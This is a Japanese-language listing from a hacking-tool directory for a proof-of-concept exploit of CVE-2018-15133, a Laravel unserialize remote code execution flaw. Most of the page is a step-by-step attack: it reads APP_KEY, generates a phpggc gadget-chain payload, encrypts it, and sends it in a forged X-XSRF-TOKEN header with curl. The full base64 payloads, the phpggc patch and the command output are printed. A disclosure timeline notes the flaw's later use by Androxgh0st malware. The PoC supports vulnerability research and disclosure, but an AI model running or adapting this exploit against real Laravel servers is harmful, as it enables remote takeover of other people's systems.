Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
laravel-poc-CVE-2018-15133 — CVE-2018-15133 (Laravel アンシリアライズ脆弱性) の PoC | Kitploit
ツール/GitHubGitHub/kozmic/laravel-poc-cve-2018-15133
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubkozmic/laravel-poc-cve-2018-15133

laravel-poc-CVE-2018-15133

CVE-2018-15133 (Laravel アンシリアライズ脆弱性) の PoC

リポジトリを見る
2583612年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Laravel Remote Code Execution : APP_KEY 漏洩時の PoC (CVE-2018-15133)

このリポジトリには、PHP 7.2.10 上で動作するシンプルな Laravel 5.6.29 アプリケーションと、routes/web.php に追加された基本的な noop ルート(Dockerfile 参照)、および CVE-2018-15133 用の Proof of Concept エクスプロイト(cve-2018-15133.php)が含まれています。このエクスプロイトは Laravel アプリケーションを悪用し、ターゲットシステム上で uname -a を実行します。

アプリケーションを起動し、ターゲットシステム上で uname -a を実行する手順

root@kitploit:~
# Docker イメージをビルド(またはこの手順をスキップして kozmico/laravel-poc-cve-2018-15133 から取得)
docker build -t laravel-poc-cve-2018-15133 .
# コンテナを起動し、localhost:8000 で公開
docker run -d -p 8000:8000 laravel-poc-cve-2018-15133
# PHP 7.2.10 上のバニラ Laravel 5.6.29 が http://localhost:8000 で動作中

Laravel 5.6.29 を実行しているデモアプリ上で uname -a を実行するには、以下の手順を実施します:

  • 実行中の Laravel アプリケーションから APP_KEY を取得
  • system("uname -a"); を実行するアンシリアライズペイロードを生成
  • アンシリアライズペイロードを APP_KEY で暗号化
  • 暗号化されたペイロードを POST リクエストヘッダーで送信し、コードが実行されることを確認。成功!

uname -a を実行するエクスプロイト例

root@kitploit:~
# APP_KEY を取得:
$ docker exec -it $(docker ps --latest --quiet) grep -e \^APP_KEY /var/www/html/laravel/.env
APP_KEY=base64:9UZUmEfHhV7WXXYewtNRtCxAYdQt44IAgJUKXk2ehRk=

# アンシリアライズペイロードを生成:
$ phpggc Laravel/RCE1 'uname -a' -b # 注: バニラの phpggc は PHP 5.6 でのみ動作します。これは修正版です
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjg6InVuYW1lIC1hIjt9

# APP_KEY でペイロードを暗号化:
$ ./cve-2018-15133.php 9UZUmEfHhV7WXXYewtNRtCxAYdQt44IAgJUKXk2ehRk= Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjg6InVuYW1lIC1hIjt9

'@kozmic による Laravel <= 5.6.29 のアンシリアライズ脆弱性 (CVE-2018-15133) の PoC

POST リクエスト用 HTTP ヘッダー:
X-XSRF-TOKEN: eyJpdiI6Imp3c1BUejE5aGFFUVM4a0NcLzIyODBnPT0iLCJ2YWx1ZSI6InZrTEdOY2o1NlVJdlltWFl3OFBxTEY1a1pCZWlaSDRSdXM1STNSa21sSE5Cb3hFd09cL2JUdU0wWHhjK0dUU0dYQzlTd3ZYSm50NTc4NW90UnNrZW5mMHc2RHdcLzZia01cL29wVUhjQml5cCtmZ1VcL2lwbnVySG52MHEwWXdZMVFVSXhWYjFEQlwveTZPQ3JORnRYdVQyeVFnODM1UGVCSVFcL3B6RGs2VDczOTZEbkFKdFwvc3lpZXBtcUo4VllLNU4zS0pMV3ZBUlNXZDRHRmNnOG1vOFZUWDVicE5uV0FcL1NSXC9HRjh2XC9YR2pLUDlEdlEwaytWRHl5TFhvb3RXM0Y4ejNXIiwibWFjIjoiOTMwMTNkZDYwYzNjYmQ1YTg4ZjRmNjM2NmZhMzBjNzA5NTgzYmI0ZWM3Y2MzOGM4YmExYjM2ZTVkOTIzZDJjYyJ9

# エクスプロイトペイロードを送信し、レスポンスの先頭行に 'uname  -a' が実行されたことを示す 'Linux ad66c19a7ab5 4.15.0-33-generic #36-Ubuntu SMP Wed Aug 15 16:00:05 UTC 2018 x86_64 GNU/Linux' が表示されるのを確認:
$ curl localhost:8000 -X POST -H 'X-XSRF-TOKEN: eyJpdiI6Imp3c1BUejE5aGFFUVM4a0NcLzIyODBnPT0iLCJ2YWx1ZSI6InZrTEdOY2o1NlVJdlltWFl3OFBxTEY1a1pCZWlaSDRSdXM1STNSa21sSE5Cb3hFd09cL2JUdU0wWHhjK0dUU0dYQzlTd3ZYSm50NTc4NW90UnNrZW5mMHc2RHdcLzZia01cL29wVUhjQml5cCtmZ1VcL2lwbnVySG52MHEwWXdZMVFVSXhWYjFEQlwveTZPQ3JORnRYdVQyeVFnODM1UGVCSVFcL3B6RGs2VDczOTZEbkFKdFwvc3lpZXBtcUo4VllLNU4zS0pMV3ZBUlNXZDRHRmNnOG1vOFZUWDVicE5uV0FcL1NSXC9HRjh2XC9YR2pLUDlEdlEwaytWRHl5TFhvb3RXM0Y4ejNXIiwibWFjIjoiOTMwMTNkZDYwYzNjYmQ1YTg4ZjRmNjM2NmZhMzBjNzA5NTgzYmI0ZWM3Y2MzOGM4YmExYjM2ZTVkOTIzZDJjYyJ9'| head -n 2

Linux ad66c19a7ab5 4.15.0-33-generic #36-Ubuntu SMP Wed Aug 15 16:00:05 UTC 2018 x86_64 GNU/Linux
<!DOCTYPE html>
<html lang="en">

PHP 7.2 用の phpggc 修正: sed -i -e 's/assert/system/g' gadgetchains/Laravel/RCE/1/gadgets.php

タイムライン

  • 2018-08-07: @kozmic により脆弱性が Laravel のセキュリティ窓口に報告され、Mitre により CVE-2018-15133 が割り当てられる
  • 2018-08-07: 報告から 7 分後にセキュリティ窓口から初回返信(素晴らしい!)
  • 2018-08-07: 脆弱性に関する詳細の説明と共有
  • 2018-08-08: 脆弱性を修正した Laravel 5.6.30 および Laravel 5.5.42 がリリース
  • 2018-09-26: @kozmic が https://github.com/kozmic/laravel-poc-CVE-2018-15133/ で PoC を公開
  • 2024-01-16: CVE-2018-15133 が CISA の既知の悪用された脆弱性(KEV)カタログ に追加される。CISA は Androxgh0st マルウェアに関連する既知の侵害インジケーター というサイバーセキュリティ勧告を公開。Androxgh0st がマルウェアツールキットの一部として CVE-2018-15133 を使用していることを文書化
ツールをダウンロード